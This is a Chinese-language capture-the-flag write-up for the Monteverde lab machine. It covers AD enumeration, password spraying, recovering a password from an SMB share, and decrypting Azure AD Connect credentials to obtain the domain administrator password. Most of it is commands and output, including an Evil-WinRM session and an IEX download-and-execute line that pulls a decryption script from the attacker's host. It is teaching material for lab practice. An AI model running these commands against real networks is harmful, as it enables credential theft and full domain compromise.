Tracks-cloud-Monteverde

cloud
22k words

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
└─$ sudo nmap -sS 10.10.10.172 -p- --min-rate=2000          
[sudo] password for fonllge: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-24 21:44 EST
Nmap scan report for 10.10.10.172
Host is up (0.25s latency).
Not shown: 65526 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
5985/tcp  open  wsman
49667/tcp open  unknown
49696/tcp open  unknown


└─$ sudo nmap -sU -Pn 10.10.10.172 --top-ports=200 --min-rate=2000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-24 21:47 EST
Nmap scan report for 10.10.10.172
Host is up (0.30s latency).
Not shown: 196 open|filtered udp ports (no-response)
PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

to User

ldap unauthorized access

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=MEGABANK,DC=LOCAL
ldapServiceName: MEGABANK.LOCAL:monteverde$@MEGABANK.LOCAL
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedControl: 1.2.840.113556.1.4.2330
supportedControl: 1.2.840.113556.1.4.2354
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCA
 L
serverName: CN=MONTEVERDE,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Co
 nfiguration,DC=MEGABANK,DC=LOCAL
schemaNamingContext: CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
namingContexts: DC=MEGABANK,DC=LOCAL
namingContexts: CN=Configuration,DC=MEGABANK,DC=LOCAL
namingContexts: CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
namingContexts: DC=DomainDnsZones,DC=MEGABANK,DC=LOCAL
namingContexts: DC=ForestDnsZones,DC=MEGABANK,DC=LOCAL
isSynchronized: TRUE
highestCommittedUSN: 78038
dsServiceName: CN=NTDS Settings,CN=MONTEVERDE,CN=Servers,CN=Default-First-Site
 -Name,CN=Sites,CN=Configuration,DC=MEGABANK,DC=LOCAL
dnsHostName: MONTEVERDE.MEGABANK.LOCAL
defaultNamingContext: DC=MEGABANK,DC=LOCAL
currentTime: 20241125050951.0Z
configurationNamingContext: CN=Configuration,DC=MEGABANK,DC=LOCAL

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

search groups

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
ldapsearch -x -H ldap://10.10.10.172 -b 'OU=Groups,DC=MEGABANK,DC=LOCAL' '(objectClass=group)' 

# extended LDIF
#
# LDAPv3
# base <OU=Groups,DC=MEGABANK,DC=LOCAL> with scope subtree
# filter: (objectClass=group)
# requesting: ALL
#

# Azure Admins, Groups, MEGABANK.LOCAL
dn: CN=Azure Admins,OU=Groups,DC=MEGABANK,DC=LOCAL
objectClass: top
objectClass: group
cn: Azure Admins
member: CN=Mike Hope,OU=London,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
member: CN=AAD_987d7f2f57d2,CN=Users,DC=MEGABANK,DC=LOCAL
member: CN=Administrator,CN=Users,DC=MEGABANK,DC=LOCAL
distinguishedName: CN=Azure Admins,OU=Groups,DC=MEGABANK,DC=LOCAL
instanceType: 4
whenCreated: 20200103001011.0Z
whenChanged: 20200103001032.0Z
uSNCreated: 36889
uSNChanged: 36897
name: Azure Admins
objectGUID:: iCAImwQrNUW6YeEQTXxy+w==
objectSid:: AQUAAAAAAAUVAAAAcwNaF5NorjL0aY3UKQoAAA==
sAMAccountName: Azure Admins
sAMAccountType: 268435456
groupType: -2147483646
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
dSCorePropagationData: 20200103123551.0Z
dSCorePropagationData: 16010101000001.0Z

# File Server Admins, Groups, MEGABANK.LOCAL
dn: CN=File Server Admins,OU=Groups,DC=MEGABANK,DC=LOCAL
objectClass: top
objectClass: group
cn: File Server Admins
distinguishedName: CN=File Server Admins,OU=Groups,DC=MEGABANK,DC=LOCAL
instanceType: 4
whenCreated: 20200103130214.0Z
whenChanged: 20200103130214.0Z
uSNCreated: 41118
uSNChanged: 41118
name: File Server Admins
objectGUID:: XbIZFB31iUu+oE5hb0Gflw==
objectSid:: AQUAAAAAAAUVAAAAcwNaF5NorjL0aY3ULgoAAA==
sAMAccountName: File Server Admins
sAMAccountType: 268435456
groupType: -2147483646
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
dSCorePropagationData: 16010101000000.0Z

# Call Recording Admins, Groups, MEGABANK.LOCAL
dn: CN=Call Recording Admins,OU=Groups,DC=MEGABANK,DC=LOCAL
objectClass: top
objectClass: group
cn: Call Recording Admins
distinguishedName: CN=Call Recording Admins,OU=Groups,DC=MEGABANK,DC=LOCAL
instanceType: 4
whenCreated: 20200103130230.0Z
whenChanged: 20200103130230.0Z
uSNCreated: 41122
uSNChanged: 41122
name: Call Recording Admins
objectGUID:: rM9iiw6U/UitOcZPMeyo/g==
objectSid:: AQUAAAAAAAUVAAAAcwNaF5NorjL0aY3ULwoAAA==
sAMAccountName: Call Recording Admins
sAMAccountType: 268435456
groupType: -2147483646
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
dSCorePropagationData: 16010101000000.0Z

# Reception, Groups, MEGABANK.LOCAL
dn: CN=Reception,OU=Groups,DC=MEGABANK,DC=LOCAL
objectClass: top
objectClass: group
cn: Reception
distinguishedName: CN=Reception,OU=Groups,DC=MEGABANK,DC=LOCAL
instanceType: 4
whenCreated: 20200103130247.0Z
whenChanged: 20200103130247.0Z
uSNCreated: 41126
uSNChanged: 41126
name: Reception
objectGUID:: ZiAJfn6gPEey3sgb7mBWkQ==
objectSid:: AQUAAAAAAAUVAAAAcwNaF5NorjL0aY3UMAoAAA==
sAMAccountName: Reception
sAMAccountType: 268435456
groupType: -2147483646
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
dSCorePropagationData: 16010101000000.0Z

# Operations, Groups, MEGABANK.LOCAL
dn: CN=Operations,OU=Groups,DC=MEGABANK,DC=LOCAL
objectClass: top
objectClass: group
cn: Operations
member: CN=Sally Morgan,OU=New York,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
distinguishedName: CN=Operations,OU=Groups,DC=MEGABANK,DC=LOCAL
instanceType: 4
whenCreated: 20200103130300.0Z
whenChanged: 20200103130930.0Z
uSNCreated: 41130
uSNChanged: 41187
name: Operations
objectGUID:: HiCe81L9ikCFSReYjd2TPQ==
objectSid:: AQUAAAAAAAUVAAAAcwNaF5NorjL0aY3UMQoAAA==
sAMAccountName: Operations
sAMAccountType: 268435456
groupType: -2147483646
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
dSCorePropagationData: 16010101000000.0Z

# Trading, Groups, MEGABANK.LOCAL
dn: CN=Trading,OU=Groups,DC=MEGABANK,DC=LOCAL
objectClass: top
objectClass: group
cn: Trading
member: CN=Dimitris Galanos,OU=Athens,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
distinguishedName: CN=Trading,OU=Groups,DC=MEGABANK,DC=LOCAL
instanceType: 4
whenCreated: 20200103130306.0Z
whenChanged: 20200103130829.0Z
uSNCreated: 41134
uSNChanged: 41174
name: Trading
objectGUID:: FiaPvN1+ykKfaRTytjWQzg==
objectSid:: AQUAAAAAAAUVAAAAcwNaF5NorjL0aY3UMgoAAA==
sAMAccountName: Trading
sAMAccountType: 268435456
groupType: -2147483646
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
dSCorePropagationData: 16010101000000.0Z

# HelpDesk, Groups, MEGABANK.LOCAL
dn: CN=HelpDesk,OU=Groups,DC=MEGABANK,DC=LOCAL
objectClass: top
objectClass: group
cn: HelpDesk
member: CN=Ray O'Leary,OU=Toronto,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
distinguishedName: CN=HelpDesk,OU=Groups,DC=MEGABANK,DC=LOCAL
instanceType: 4
whenCreated: 20200103130325.0Z
whenChanged: 20200103130815.0Z
uSNCreated: 41138
uSNChanged: 41170
name: HelpDesk
objectGUID:: aLZrfWbg1Eyo2mjbtOFWXA==
objectSid:: AQUAAAAAAAUVAAAAcwNaF5NorjL0aY3UMwoAAA==
sAMAccountName: HelpDesk
sAMAccountType: 268435456
groupType: -2147483646
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
dSCorePropagationData: 16010101000000.0Z

# Developers, Groups, MEGABANK.LOCAL
dn: CN=Developers,OU=Groups,DC=MEGABANK,DC=LOCAL
objectClass: top
objectClass: group
cn: Developers
distinguishedName: CN=Developers,OU=Groups,DC=MEGABANK,DC=LOCAL
instanceType: 4
whenCreated: 20200103130340.0Z
whenChanged: 20200103130340.0Z
uSNCreated: 41142
uSNChanged: 41142
name: Developers
objectGUID:: +fTskeAElUaRwaJvDjbehQ==
objectSid:: AQUAAAAAAAUVAAAAcwNaF5NorjL0aY3UNAoAAA==
sAMAccountName: Developers
sAMAccountType: 268435456
groupType: -2147483646
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
dSCorePropagationData: 16010101000000.0Z

# search result
search: 2
result: 0 Success

# numResponses: 9
# numEntries: 8

smb没有未授权,ldap的desc也没有看到有价值的东西

这里我做的时候卡住了,看了wp才知道是撞弱口令,说实话挺弱弱智的,但是确实也太久没遇到弱口令的,之后记住了。

rpc导出user

1
2
3
4
5
6
7
8
9
10
11
└─$ rpcclient -U '' -N 10.10.10.172 -c 'querydispinfo'
index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2       Name: AAD_987d7f2f57d2  Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos       Name: Dimitris Galanos  Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer/domain
index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope  Name: Mike Hope Desc: (null)
index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary        Name: Ray O'Leary       Desc: (null)
index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs    Name: SABatchJobs       Desc: (null)
index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan        Name: Sally Morgan      Desc: (null)
index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata        Name: svc-ata   Desc: (null)
index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec      Name: svc-bexec Desc: (null)
index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp     Name: svc-netapp        Desc: (null)

然后cme撞用户名撞弱口令,会得到

SABatchJobs/SABatchJobs

但是这个用户并没有remote权限,所以可以看下smb

1
2
3
4
5
6
7
8
9
10
11
12
└─$ smbclient -L '//10.10.10.172' -U 'SABatchJobs%SABatchJobs'   

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        azure_uploads   Disk      
        C$              Disk      Default share
        E$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
        users$          Disk

users$中存在azure.xml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
dsmb: \mhope\> dir
  .                                   D        0  Fri Jan  3 08:41:18 2020
  ..                                  D        0  Fri Jan  3 08:41:18 2020
  azure.xml                          AR     1212  Fri Jan  3 08:40:23 2020

                31999 blocks of size 4096. 28979 blocks available
smb: \mhope\> get azure.xml

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>

拿到mhope账号密码

1
2
mhope
4n0therD4y@n0th3r$

alt text

remote management users权限

Get User

to Root

当前用户下有一个.azure,其中包含了azure的Token缓存等

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
*Evil-WinRM* PS C:\Users\mhope\.azure> download TokenCache.dat
                                        
Info: Downloading C:\Users\mhope\.azure\TokenCache.dat to TokenCache.dat
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\mhope\.azure> dir


    Directory: C:\Users\mhope\.azure


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         1/3/2020   5:35 AM                ErrorRecords
-a----         1/3/2020   5:31 AM             34 AzurePSDataCollectionProfile.json
-a----         1/3/2020   5:35 AM           2794 AzureRmContext.json
-a----         1/3/2020   5:31 AM            191 AzureRmContextSettings.json
-a----         1/3/2020   5:36 AM           7896 TokenCache.dat

这里参考如下

https://www.lares.com/blog/hunting-azure-admins-for-vertical-escalation-part-2/

可以考虑窃取auzre的token

但是拿着没鸟用

所以考虑本地提权

https://blog.xpnsec.com/azuread-connect-for-redteam/

作者跟踪了哈希密码同步(PHS)情况下,使用侧获取本地azuread同步数据库中的加密凭证后mcrypt.dll进行解密的一个方式,并且提供了一个poc

在poc中主要还是围绕着mcrypt.dll的解密方式进行传参,几个参数如下

1
2
3
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)

对应

1
2
3
4
*Evil-WinRM* PS C:\Users\mhope\.azure\ErrorRecords> sqlcmd -Q 'SELECT keyset_id, instance_id, entropy FROM ADsync.dbo.mms_server_configuration'
keyset_id   instance_id                          entropy
----------- ------------------------------------ ------------------------------------
          1 1852B527-DD4F-4ECF-B541-EFCCBFF29E31 194EC2FC-F186-46CF-B44D-071EB61F49CD
1
2
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)

对应

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
*Evil-WinRM* PS C:\Users\mhope\Documents> $client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=.;Integrated Security=true;Initial Catalog=ADsync"          
*Evil-WinRM* PS C:\Users\mhope\Documents> $client.Open()                                                                                                                             
*Evil-WinRM* PS C:\Users\mhope\Documents> $cmd = $client.CreateCommand()                                                                                                             
*Evil-WinRM* PS C:\Users\mhope\Documents> $cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"              
                                                                                                                                                                                     
*Evil-WinRM* PS C:\Users\mhope\Documents>                                                                                                                                            
*Evil-WinRM* PS C:\Users\mhope\Documents> $reader = $cmd.ExecuteReader()                                                                                                             
*Evil-WinRM* PS C:\Users\mhope\Documents> $reader.Read() | Out-Null                                                                                                                  
*Evil-WinRM* PS C:\Users\mhope\Documents> $reader.GetString(0)                                                                                                                       
<adma-configuration>                                                                                                                                                                 
 <forest-name>MEGABANK.LOCAL</forest-name>                                                                                                                                           
 <forest-port>0</forest-port>                                                                                                                                                        
 <forest-guid>{00000000-0000-0000-0000-000000000000}</forest-guid>                                                                                                                   
 <forest-login-user>administrator</forest-login-user>                                                                                                                                
 <forest-login-domain>MEGABANK.LOCAL</forest-login-domain>                                                                                                                           
 <sign-and-seal>1</sign-and-seal>                                                                                                                                                    
 <ssl-bind crl-check="0">0</ssl-bind>                                                                                                                                                
 <simple-bind>0</simple-bind>                                                                                                                                                        
 <default-ssl-strength>0</default-ssl-strength>                                                                                                                                      
 <parameter-values>                                                                                                                                                                  
  <parameter name="forest-login-domain" type="string" use="connectivity" dataType="String">MEGABANK.LOCAL</parameter>                                                                
  <parameter name="forest-login-user" type="string" use="connectivity" dataType="String">administrator</parameter>                                                                   
  <parameter name="password" type="encrypted-string" use="connectivity" dataType="String" encrypted="1" />                                                                           
  <parameter name="forest-name" type="string" use="connectivity" dataType="String">MEGABANK.LOCAL</parameter>                                                                        
  <parameter name="sign-and-seal" type="string" use="connectivity" dataType="String">1</parameter>                                                                                   
  <parameter name="crl-check" type="string" use="connectivity" dataType="String">0</parameter>                                                                                       
  <parameter name="ssl-bind" type="string" use="connectivity" dataType="String">0</parameter>                                                                                        
  <parameter name="simple-bind" type="string" use="connectivity" dataType="String">0</parameter>                                                                                     
  <parameter name="Connector.GroupFilteringGroupDn" type="string" use="global" dataType="String" />                                                                                  
  <parameter name="ADS_UF_ACCOUNTDISABLE" type="string" use="global" dataType="String" intrinsic="1">0x2</parameter>                                                                 
  <parameter name="ADS_GROUP_TYPE_GLOBAL_GROUP" type="string" use="global" dataType="String" intrinsic="1">0x00000002</parameter>                                                    
  <parameter name="ADS_GROUP_TYPE_DOMAIN_LOCAL_GROUP" type="string" use="global" dataType="String" intrinsic="1">0x00000004</parameter>                                              
  <parameter name="ADS_GROUP_TYPE_LOCAL_GROUP" type="string" use="global" dataType="String" intrinsic="1">0x00000004</parameter>                                                     
  <parameter name="ADS_GROUP_TYPE_UNIVERSAL_GROUP" type="string" use="global" dataType="String" intrinsic="1">0x00000008</parameter>                                                 
  <parameter name="ADS_GROUP_TYPE_SECURITY_ENABLED" type="string" use="global" dataType="String" intrinsic="1">0x80000000</parameter>                                                
  <parameter name="Forest.FQDN" type="string" use="global" dataType="String" intrinsic="1">MEGABANK.LOCAL</parameter>                                                                
  <parameter name="Forest.LDAP" type="string" use="global" dataType="String" intrinsic="1">DC=MEGABANK,DC=LOCAL</parameter>                                                          
  <parameter name="Forest.Netbios" type="string" use="global" dataType="String" intrinsic="1">MEGABANK</parameter>                                                                   
</parameter-values>                                                                                                                                                                  
 <password-hash-sync-config>                                                                                                                                                         
            <enabled>1</enabled>                                                                                                                                         
            <target>{B891884F-051E-4A83-95AF-2544101C9083}</target>                                                                                                      
         </password-hash-sync-config>                                                                                                                                    
</adma-configuration>                  

1
2
 *Evil-WinRM* PS C:\Users\mhope\Documents> $reader.GetString(1)
8AAAAAgAAABQhCBBnwTpdfQE6uNJeJWGjvps08skADOJDqM74hw39rVWMWrQukLAEYpfquk2CglqHJ3GfxzNWlt9+ga+2wmWA0zHd3uGD8vk/vfnsF3p2aKJ7n9IAB51xje0QrDLNdOqOxod8n7VeybNW/1k+YWuYkiED3xO8Pye72i6D9c5QTzjTlXe5qgd4TCdp4fmVd+UlL/dWT/mhJHve/d9zFr2EX5r5+1TLbJCzYUHqFLvvpCd1rJEr68g95aWEcUSzl7mTXwR4Pe3uvsf2P8Oafih7cjjsubFxqBioXBUIuP+BPQCETPAtccl7BNRxKb2aGQ=

这里直接加载poc的话会报错,如下

1
2
3
4
5
6
7
8
9
*Evil-WinRM* PS C:\Users\mhope\Documents> $client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"                
*Evil-WinRM* PS C:\Users\mhope\Documents> $client.Open()

Exception calling "Open" with "0" argument(s): "A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: SQL Network Interfaces, error: 52 - Unable to locate a Local Database Runtime installation. Verify that SQL Server Express is properly installed and that the Local Database Runtime feature is enabled.)"
At line:1 char:1
+ $client.Open()
+ ~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : SqlException

查了下

https://stackoverflow.com/questions/76810566/using-system-data-sqlclient-sqlconnection-from-powershell-to-execute-contents-of

https://stackoverflow.com/questions/64410277/cannot-find-sql-server-sqlconnection-problem

poc中的数据库连接方式有点问题debug了一会

1
2
3
4
5
6
7
8
9
10
11
...
*Evil-WinRM* PS C:\Users\mhope\Documents> $client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=localhost\ADsync;Integrated Security=true;Initial Catalog=ADsync"
*Evil-WinRM* PS C:\Users\mhope\Documents> $client.open()
Exception calling "Open" with "0" argument(s): "A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: SQL Network Interfaces, error: 26 - Error Locating Server/Instance Specified)"
At line:1 char:1
+ $client.open()
+ ~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : SqlException
*Evil-WinRM* PS C:\Users\mhope\Documents> $client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=.;Integrated Security=true;Initial Catalog=ADsync"
*Evil-WinRM* PS C:\Users\mhope\Documents> $client.open()

改成如下即可,source data有点问题

1
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=.;Integrated Security=true;Initial Catalog=ADSync"

就不报错了

1
2
3
4
*Evil-WinRM* PS C:\Users\mhope\Documents> IEX(new-object Net.WebClient).downloadstring("http://10.10.16.2/azuread_decrypt_msol.ps1")
Domain: MEGABANK.LOCAL                                            
Username:administrator                                                                            
Password: d0m@in4dminyeah!

get Root